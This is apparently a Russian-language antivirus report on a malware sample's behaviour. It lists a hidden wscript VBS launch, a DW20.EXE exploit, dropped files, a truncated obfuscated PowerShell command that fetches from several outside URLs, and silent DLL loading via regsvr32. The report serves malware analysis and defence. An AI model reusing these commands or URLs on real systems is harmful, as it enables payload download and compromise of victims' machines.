Техническая информация
Вредоносные функции
Создает и запускает на исполнение (эксплоит)
- '<SYSTEM32>\wscript.exe' %ALLUSERSPROFILE%\bbiwjdf.vbs
Запускает на исполнение (эксплоит)
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1524
Изменения в файловой системе
Создает следующие файлы
- %ALLUSERSPROFILE%\bbiwjdf.vbs
- %TEMP%\1348425.cvr
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command "$ghkid=('$MJXdfshDrfGZses4=\"http:ufieufieboardingschoolsoftware.comufiebackupufieVC7WKufiebouhttp:ufieufietowardsun.netufieadminufieO29Fjaufiebouhttp:ufieufie47.244.189.73ufiewell-kn...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c start /B %WINDIR%\syswow64\regsvr32.exe /s %ALLUSERSPROFILE%\oiphilfj.dll' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command "$ghkid=('$MJXdfshDrfGZses4=\"http:ufieufieboardingschoolsoftware.comufiebackupufieVC7WKufiebouhttp:ufieufietowardsun.netufieadminufieO29Fjaufiebouhttp:ufieufie47.244.189.73ufiewell-kn...
- '<SYSTEM32>\cmd.exe' /c start /B %WINDIR%\syswow64\regsvr32.exe /s %ALLUSERSPROFILE%\oiphilfj.dll
- '%WINDIR%\syswow64\regsvr32.exe' /s %ALLUSERSPROFILE%\oiphilfj.dll
